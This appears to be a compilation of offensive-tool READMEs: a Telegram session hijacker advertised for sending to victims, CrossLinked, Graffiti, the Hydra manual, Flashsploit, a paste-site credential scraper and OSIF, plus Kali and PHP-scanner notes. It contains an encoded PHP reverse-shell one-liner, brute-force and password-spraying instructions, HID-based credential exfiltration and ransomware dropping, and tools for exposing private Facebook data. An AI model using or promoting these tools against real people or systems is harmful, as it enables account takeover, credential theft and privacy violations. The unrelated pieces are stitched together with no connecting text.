TeleShadow3 - Advanced Telegram Desktop Session Hijacker

Stealing desktop Telegram sessions has never been so easy! Set the email and sender/recipient details, or use the Telegram API, compile it, and send it to the victim.

How do I use the session file?
Just put tdata and telegram.exe in the same directory and open telegram.exe.

What features does it have?
- Bypass new security mechanisms
- Bypass two-step verification
- Bypass inherent identity and the need for a 5-digit verification code
- Support SMTP transport
- Support Telegram API transport (with proxy)
- Support FakeMessage
- Support custom icons
- Bypass A.V. (coming soon...)

NOTE: Only official Telegram desktop clients are currently supported.

CrossLinked simplifies the process of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using search-engine scraping similar to tools like subscraper and pymeta, CrossLinked finds valid employee names and helps format them according to the organization's account naming convention. Results are written to a 'names.txt' file in the current directory for further testing.

Setup
  git clone https://github.com/m8r0wn/crosslinked
  cd crosslinked
  pip3 install -r requirements.txt

Examples
  python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
  python3 crosslinked.py -f 'domain{f}{last}' -t 45 -j 0.5 company_name

Usage
  -h, --help    show this help message and exit
  -t TIMEOUT    Timeout [seconds] for search threads (Default: 25)
  -j JITTER     Jitter for scraping evasion (Default: 0)
  -o OUTFILE    Change name of output file (default: names.txt)
  -f NFORMAT    Format names, ex: 'domain{f}{last}', '{first}.{last}@domain.com'
  -s, --safe    Only parse names with company in title (Reduces false positives)
  -v            Show names and titles recovered after enumeration

Additions
Two additional scripts are included in this repo to aid in generating potential username and password files:

pwd_gen.py - Generates custom password lists using words and variables defined at the top of the script. It performs number/letter substitutions, appends special characters, and more. Once configured, run the script with no arguments to generate a 'passwords.txt' output file.

user_gen.py - Generates custom usernames using inputs from firstname.txt and lastname.txt files provided at the command line. The format is defined similarly to crosslinked.py, and output is written to 'users.txt'.
  python3 user_gen.py -first top100_firstnames.txt -last top100_lastnames.txt -f "domain{f}{last}"

NOTE: Never upload payloads to online checkers.

Graffiti is a tool to generate obfuscated one-liners to aid in penetration testing. Graffiti accepts the following languages for encoding: Python, Perl, Batch, PowerShell, PHP, Bash. Graffiti will also accept a language that is not currently on the list and store the one-liner in its database.

Features
Graffiti comes with a database into which each encoded payload is inserted, so that end users can view already-created payloads for future use. Payloads can be encoded using the following techniques: XOR, Base64, Hex, ROT13, Raw.

Some features of Graffiti include:
- Terminal drop-in access, with the ability to run external commands
- Ability to create your own payload JSON files
- Ability to view cached payloads inside the database
- Ability to run the database in memory for quick deletion
- Terminal history and saving of terminal history
- Auto tab completion inside the terminal
- Ability to securely wipe the history files and database file
- Multiple encoding techniques as mentioned above

Usage
Graffiti comes with a built-in terminal; when you pass no flags to the program it drops into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. To get help, just type help or ?:

  (ASCII-art banner) v(0.1)
  no arguments have been passed, dropping into terminal
  type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
  [email protected]:~/graffiti# ?
  Command      Description
  ---------    --------------
  help/?       Show this help
  external     List available external commands
  cached       Display all payloads that are already in the database
  list/show    List all available payloads
  search       Search for a specific payload
  use          Use this payload and encode it using a specified coder
  info         Get information on a specified payload
  check        Check for updates
  history      Display command history
  exit/quit    Exit the terminal and running session
  encode       Encode a provided payload

Typing help prints the same table.

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

  usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

  optional arguments:
    -h, --help            show this help message and exit
    -c CODEC, --codec CODEC
                          specify an encoding technique (*default=None)
    -p PAYLOAD, --payload PAYLOAD
                          pass the path to a payload to use (*default=None)
    --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                          create a payload file and store it inside of ./etc/payloads (*default=None)
    -l, --list            list all available payloads by path (*default=False)
    -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                          pass your own personal payload to use for the encoding (*default=None)
    -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                          pass a listening address to use for the payload (if needed) (*default=None)
    -lP LISTENING-PORT, --lport LISTENING-PORT
                          pass a listening port to use for the payload (if needed) (*default=None)
    -u URL, --url URL     pass a URL if needed by your payload (*default=None)
    -vC, --view-cached    view the cached data already present inside of the database
    -H, --no-history      do not store the command history (*default=True)
    -W, --wipe            wipe the database and the history (*default=False)
    --memory              initialize the database into memory instead of a .db file (*default=False)
    -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                          pass more external commands, this will allow them to be accessed inside of the terminal; commands must be in your PATH (*default=None)

Encoding a payload is as simple as this:

  [email protected]:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
  Encoded Payload:
  --------------------------------------------------
  php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
  --------------------------------------------------

Installation
On any Linux, Mac, or Windows system, Graffiti should work out of the box without installing any external packages. If you would like to install Graffiti as an executable on your system (you must be running either Linux or Mac for this to work), all you have to do is run:
  ./install.sh
This installs Graffiti onto your system and lets you run it from anywhere.

Bugs and issues
If you happen to find a bug or an issue, please create an issue with details on the project's issue tracker. Thank you ahead of time!

This release brings the kernel up to version 4.19.28, fixes numerous bugs, includes many updated packages, and, most excitingly, features a new release of Kali Linux NetHunter!

Kali NetHunter 2019.2 Release
NetHunter now supports over 50 devices running all the latest Android versions, from KitKat through to Pie. 13 new NetHunter images have been released for the latest Android versions of your favorite devices, including:
- Nexus 6 running Pie
- Nexus 6P, Oreo
- OnePlus2, Pie
- Galaxy Tab S4 LTE & WiFi, Oreo
These and many more can be downloaded from the NetHunter page.

Tool Upgrades
This release largely features various tweaks and bug fixes, but there are still many updated tools, including seclists, msfpc, and exe2hex. For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog.

ARM Updates
For ARM users, be aware that the first boot will take a bit longer than usual, as it requires the reinstallation of a few packages on the hardware. This manifests as the login manager crashing a few times until the packages finish reinstalling, and is expected behaviour.

Upgrade to Kali Linux 2019.2
If you already have a Kali installation you're happy with, you can easily upgrade in place as follows:
  root@kali:~# apt update && apt -y full-upgrade

Ensuring your Installation is Updated
To double-check your version, first make sure your Kali package repositories are correct:
  root@kali:~# cat /etc/apt/sources.list
  deb http://http.kali.org/kali kali-rolling main non-free contrib
Then, after running 'apt -y full-upgrade', you may require a reboot before checking:
  root@kali:~# grep VERSION /etc/os-release
  VERSION="2019.2"
  VERSION_ID="2019.2"
  root@kali:~# uname -a
  Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
If you come across any bugs in Kali, please open a report on our bug tracker.

Versionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in, to report back potential issues.

PLEASE NOTE: Work is still in progress to adapt the tool to Linux distributions that backport security fixes. As of right now, it only reports on the plain version string that PHP reports.

Installation
Using Composer:
  {
      "require": {
          "psecio/versionscan": "dev-master"
      }
  }
The only current dependency is the Symfony console.

Usage
To run the scan against your current PHP version, use:
  bin/versionscan
The script checks PHP_VERSION for the current instance and generates pass/fail results. The output looks similar to:

  Executing against version: 5.4.24
  +--------+---------------+------+------------------------------------------------------------------------------------------------------+
  | Status | CVE ID        | Risk | Summary                                                                                              |
  +--------+---------------+------+------------------------------------------------------------------------------------------------------+
  | FAIL   | CVE-2014-3597 | 6.8  | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 ... |
  | FAIL   | CVE-2014-3587 | 4.3  | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in... |

Results are also colorized to make the pass/fail of each check easy to see.

Parameters
Several parameters can be given to the tool to configure its scans and results:

PHP Version
If you'd like to check a PHP version other than the one the script detects, use the php-version parameter:
  bin/versionscan scan --php-version=4.3.2

Report Only Failures
You can also tell versionscan to report only the failures and not the passing tests:
  bin/versionscan scan --fail-only

Sorting results
You can sort the results either by CVE ID or by severity (risk rating), with the sort parameter and either the "cve" or "risk" value:
  bin/versionscan scan --sort=risk

Output formats
By default versionscan outputs information directly to the console in a human-readable form. You can also specify other output formats that may be easier to parse programmatically (like JSON). Use the --format option to change the output:
  vendor/bin/versionscan scan --php-version=5.5 --format=json
Supported output formats are console, json, xml and html. The HTML output format requires an --output option naming the directory to write the file to:
  vendor/bin/versionscan scan --php-version=5.5 --format=html --output=/var/www/output
The result will be written to a file named something like versionscan-output-20150808.html.

Powerful Simple XSS Scanner made with Python 3.7

Installing
Requirements:
- BeautifulSoup4: pip install bs4
- requests: pip install requests
- Python 3.7

Commands:
  git clone https://github.com/menkrep1337/XSSCon
  cd XSSCon
  python3 xsscon.py --help

Usage
Basic usage:
  python3 xsscon.py -u http://testphp.vulnweb.com
For advanced usage, see the help:
  python3 xsscon.py --help

Roadmap
- v0.3B: Added custom options (such as --proxy, --user-agent, etc.); first launch.
- v0.3B Patch: Added support for form method GET.

Number one of the biggest security holes are passwords, as every password security study shows. This tool is proof-of-concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

THIS TOOL IS FOR LEGAL PURPOSES ONLY!

There are already several login hacker tools available; however, none supports more than one protocol to attack or parallelized connects. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.

Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

However, the module engine for new services is very easy to use, so it won't take long until even more services are supported.

WHERE TO GET
You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases
If you are interested in the current development state, the public development repository is at Github:
  svn co https://github.com/vanhauser-thc/thc-hydra
or
  git clone https://github.com/vanhauser-thc/thc-hydra
Use the development version at your own risk. It contains new features and new bugs. Things might not work!

HOW TO COMPILE
To configure, compile and install hydra, just type:
  ./configure
  make
  make install
If you want the ssh module, you have to set up libssh (not libssh2!) on your system; get it from http://www.libssh.org. For ssh v1 support you also need to add the "-DWITH_SSH1=On" option on the cmake command line.
IMPORTANT: If you compile on MacOS then you must do this; do not install libssh via brew!

If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):
  apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libmemcached-dev
This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the Apple Filing Protocol, which you will need to download and install from the vendors' web sites.
For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually.

SUPPORTED PLATFORMS
- All UNIX platforms (Linux, *BSD, Solaris, etc.)
- MacOS (basically a BSD clone)
- Windows with Cygwin (both IPv4 and IPv6)
- Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

HOW TO USE
If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.
Note that NO login/password file is included. Generate them yourself. A default password list is however present; use "dpl4hydra.sh" to generate a list.
For Linux users, a GTK GUI is available, try ./xhydra

For the command line usage, the syntax is as follows:
For attacking one target or a network, you can use the new "://" style:
  hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS
The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you must use this one:
  hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]
Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.
- PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get; many others are available
- TARGET is the target you want to attack
- MODULE-OPTIONS are optional values which are special per PROTOCOL module

FIRST - select your target
You have three options on how to specify the target you want to attack:
- a single target on the command line: just put the IP or DNS address in
- a network range on the command line: CIDR specification like "192.168.0.0/24"
- a list of hosts in a text file: one line per entry (see below)

SECOND - select your protocol
Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.

THIRD - check if the module has optional parameters
  hydra -U PROTOCOL
e.g.
  hydra -U smtp

FOURTH - the destination port
This is optional! If no port is supplied, the default common port for the PROTOCOL is used. If you specify SSL to use ("-S" option), the SSL common port is used by default.
If you use "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack:
  hydra [some command line options] ftp://[192.168.0.0/24]/
  hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM
Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!

If you want to supply your targets via a text file, you can not use the :// notation but must use the old style and just supply the protocol (and module options):
  hydra [some command line options] -M targets.txt ftp
You can also supply the port for each target entry by adding ":" after a target entry in the file, e.g.:
  foo.bar.com
  target.com:21
  unusual.port.com:2121
  default.used.here.com
  127.0.0.1
  127.0.0.1:2121
Note that if you want to attack IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:
  foo.bar.com
  target.com:21
  [fe80::1%eth0]
  [2001::1]
  [2002::2]:8080
  [2a01:24a:133:0:00:123:ff:1a]

LOGINS AND PASSWORDS
You have many options on how to attack with logins and passwords. With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.:
  hydra -l admin -p password ftp://localhost/
  hydra -L default_logins.txt -p test ftp://localhost/
  hydra -l admin -P common_passwords.txt ftp://localhost/
  hydra -L logins.txt -P passwords.txt ftp://localhost/
Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:
- s - try the login as password
- n - try an empty password
- r - reverse the login and try it as password
If you want to, e.g., try "login as password" and "empty password", you specify "-e sn" on the command line.

But there are two more modes for trying passwords than -p/-P:
You can use a text file where a login and password pair is separated by a colon, e.g.:
  admin:password
  test:test
  foo:bar
This is a common default account style listing, which is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option; note that in this mode you can not use the -l/-L/-p/-P options (-e nsr however you can). Example:
  hydra -C default_accounts.txt ftp://localhost/
And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C):
  -x minimum_length:maximum_length:charset
The charset definition is a for lowercase letters, A for uppercase letters, 1 for numbers, and anything else you supply is taken literally. Examples:
  -x 1:3:a    generate passwords from length 1 to 3 with all lowercase letters
  -x 2:5:/    generate passwords from length 2 to 5 containing only slashes
  -x 5:8:A1   generate passwords from length 5 to 8 with uppercase and numbers
Example:
  hydra -l ftp -x 3:3:a ftp://localhost/

SPECIAL OPTIONS FOR MODULES
Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it! To see the special option of a module, type:
  hydra -U <module>
e.g.
  ./hydra -U http-post-form
The special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format. Examples (they are all equal):
  ./hydra -l test -p test -m PLAIN 127.0.0.1 imap
  ./hydra -l test -p test 127.0.0.1 imap PLAIN
  ./hydra -l test -p test imap://127.0.0.1/PLAIN

RESTORING AN ABORTED/CRASHED SESSION
When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes.
NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX).

HOW TO SCAN/CRACK OVER A PROXY
The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid:
  HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
  HYDRA_PROXY_HTTP="http://login:password@proxy:8080/"
  HYDRA_PROXY_HTTP="proxylist.txt"
The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).
For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax, e.g.:
  HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port
for example:
  HYDRA_PROXY=connect://proxy.anonymizer.com:8000
  HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080
  HYDRA_PROXY=socksproxylist.txt

ADDITIONAL HINTS
- Sort your password files by likelihood and use the -u option to find passwords much faster!
- uniq your dictionary files! This can save you a lot of time :)
    cat words.txt | sort | uniq > dictionary.txt
- If you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing at least one letter and one number, etc.), use the tool pw-inspector, which comes along with the hydra package, to reduce the password list:
    cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

RESULTS OUTPUT
The results are output to stdout along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:
- text - plain text format
- jsonv1 - JSON data using version 1.x of the schema (defined below)
- json - JSON data using the latest version of the schema; currently there is only version 1
If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.

JSON Schema
Here is an example of the JSON output. Notes on some of the fields:
- errormessages - an array of zero or more strings that are normally printed to stderr at the end of Hydra's run. The text is very free form.
- success - indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion.
- quantityfound - how many username+password combinations were discovered.
- jsonoutputversion - version of the schema: 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra always makes the second part of the version two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.

Version 1.00 example:
  {
    "errormessages": [
      "[ERROR] Error Message of Something",
      "[ERROR] Another Message",
      "These are very free form"
    ],
    "generator": {
      "built": "2019-03-01 14:44:22",
      "commandline": "hydra -b jsonv1 -o results.json ... ...",
      "jsonoutputversion": "1.00",
      "server": "127.0.0.1",
      "service": "http-post-form",
      "software": "Hydra",
      "version": "v8.5"
    },
    "quantityfound": 2,
    "results": [
      {
        "host": "127.0.0.1",
        "login": "[email protected]",
        "password": "bill",
        "port": 9999,
        "service": "http-post-form"
      },
      {
        "host": "127.0.0.1",
        "login": "[email protected]",
        "password": "joe",
        "port": 9999,
        "service": "http-post-form"
      }
    ],
    "success": false
  }

SPEED
Through the parallelizing feature, this password cracker tool can be very fast; however, it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher, the faster ;) (but too high, and it disables the service).

STATISTICS
Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down.

                        P A R A L L E L   T A S K S
  SERVICE     1      4      8     16     32     50     64    100    128
  -------  -----------------------------------------------------------------
  telnet   23:20   5:58   2:58   1:34   1:05   0:33  0:45*  0:25*  0:55*
  ftp      45:54  11:51   5:54   3:06   1:25   0:58   0:46   0:29   0:32
  pop3     92:10  27:16  13:56   6:42   2:55   1:57   1:24   1:14   0:50
  imap     31:05   7:41   3:51   1:58   1:01   0:39   0:32   0:25   0:21

(*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown...

guesses per task (rounded up):
  295  74  38  19  10  6  5  3  3

guesses possible per connect (depends on the server software and config):
  telnet 4, ftp 6, pop3 1, imap 3

Flashsploit is an exploitation framework for attacks using ATtiny85 HID devices such as the Digispark USB development board. Flashsploit generates Arduino IDE compatible (.ino) scripts based on user input and then starts a listener in Metasploit-Framework if required by the script. In summary: automatic script generation with automated msfconsole.

Features
TODO: Add Linux and OSX scripts

Windows
Data Exfiltration
- Extract all WiFi passwords and upload an XML to an SFTP server
- Extract network configuration information of the target system and upload it to an SFTP server
- Extract passwords and other critical information using Mimikatz and upload it to an SFTP server
Reverse Shells
- Get reverse shell by abusing Microsoft HTML Apps (mshta)
- Get reverse shell by abusing Certification Authority Utility (certutil)
- Get reverse shell by abusing Windows Script Host (cscript)
- Get reverse shell by abusing Windows Installer (msiexec)
- Get reverse shell by abusing Microsoft Register Server Utility (regsvr32)
Miscellaneous
- Change wallpaper of target machine
- Make Windows unresponsive using a .bat script (100% CPU and RAM usage)
- Drop and execute a file of your choice, a ransomware maybe? 😉
- Disable Windows Defender service on target machine

Tested on
- Kali Linux 2019.2
- BlackArch Linux

Dependencies
Flashsploit depends upon 4 packages which are generally pre-installed in major pentest OS distributions:
- Metasploit-Framework
- Python 3
- SFTP
- PHP
If you think I should still make an install script, open an issue.

Usage
  git clone https://github.com/thewhiteh4t/flashsploit.git
  cd flashsploit
  python3 flashsploit.py

Just the code of my OSINT bot searching for sensitive data leaks on different paste sites.

Search terms:
- credentials
- private RSA keys
- WordPress configuration files
- MySQL connect strings
- onion links
- links to files hosted inside the onion network (PDF, DOC, DOCX, XLS, XLSX)

Keep in mind: This bot is not beautiful. The code is not complete so far. Some parts, like integrating the credentials into a database, are missing in this online repository. If you want to use this code, feel free to do so. Keep in mind you have to customize things to make it run on your system.

IMPORTANT
The bot can be run in two major modes:
- API mode
- Scraping mode (using TOR)

I highly recommend using the API mode. It is the intended method of scraping pastes from Pastebin.com, and it is just fair to do so. The only thing you need is a Pastebin.com PRO account and to whitelist your public IP on their site. To start the bot in API mode, just run the program in the following way:
  python run.py -0

However, it is not always possible to use this intended method, as you might be behind NAT and therefore do not have an IP exclusively (whitelisting your IP is not reasonable here). That is the reason why a scraping mode is implemented, where fast TOR circuit cycling in combination with reasonable user agents is used to avoid IP blocking and Cloudflare captchas. To start the bot in scraping mode, run it in the following way:
  python run.py -1
Important note: you need the TOR service installed on your system, listening on port 9050. Additionally you need to add the following line to your /etc/tor/torrc file:
  MaxCircuitDirtiness 30
This sets the maximum circuit lifetime of TOR to 30 seconds.

Usage
To learn how to use the software, you just need to call the run.py script with the -h/--help argument:
  python run.py -h
Output:
  (ASCII-art banner)
  usage: run.py [-h] [-0] [-1] [-2] [-ps]

  Control software for the different modules of this paste crawler.

  optional arguments:
    -h, --help            show this help message and exit
    -0, --pastebinCOMapi  Activate Pastebin.com module (using API)
    -1, --pastebinCOMtor  Activate Pastebin.com module (standard scraping using TOR to avoid IP blocking)
    -2, --pasteORG        Activate Paste.org module
    -ps, --pStatistic     Show a simple statistic.

So far I have only implemented the Pastebin.com module, and I am working on Paste.org. I will add more modules and update this script over time.

Just start the Pastebin.com module separately:
  python P_bot.py
Pastes are stored in data/raw_pastes until there are more than 48000 of them. When there are more than 48000, they get filtered, zipped and moved to the archive folder. All pastes which contain credentials are stored in data/files_with_passwords. Keep in mind that at the moment only combinations like USERNAME:PASSWORD and other simple combinations are detected.

However, there is a tool to search for proxy logs containing credentials. You can search for proxy logs (URLs with username and password combinations) by using the getProxyLogs.py file:
  python getProxyLogs.py data/raw_pastes

If you want to search the raw data for specific strings, you can do it using searchRaw.py (really slow):
  python searchRaw.py SEARCHSTRING

To see statistics of the bot, just call:
  python status.py

The file findSensitiveData.py searches a folder (with pastes) for sensitive data like credit cards, RSA keys or mysqli_connect strings. Keep in mind that this script uses grep and is therefore really slow on a big amount of paste files. If you want to analyze a big amount of pastes, I recommend an ELK stack.
  python findSensitiveData.py data/raw_pastes

There are two scripts, stalk_user.py/stalk_user_wrapper.py, which can be used to monitor a specific Twitter user. This means every tweet they post gets saved and every URL it contains gets downloaded. To start the stalker, just execute the wrapper:
  python stalk_user_wrapper.py

OSIF is an accurate Facebook account information gathering tool; all sensitive information can be easily gathered even though the target sets all of its privacy to (only me): sensitive information about residence, date of birth, occupation, phone number and email address.

Installation
  $ pkg update upgrade
  $ pkg install git python2
  $ git clone https://github.com/ciku370/OSIF
  $ cd OSIF

Setup
  $ pip2 install -r requirements.txt

Running
  $ python2 osif.py

If you are confused about how to use it, please type 'help' to display the help menu.
[Warn] Please turn off your VPN before using this program!
[Tips] Do not overuse this program!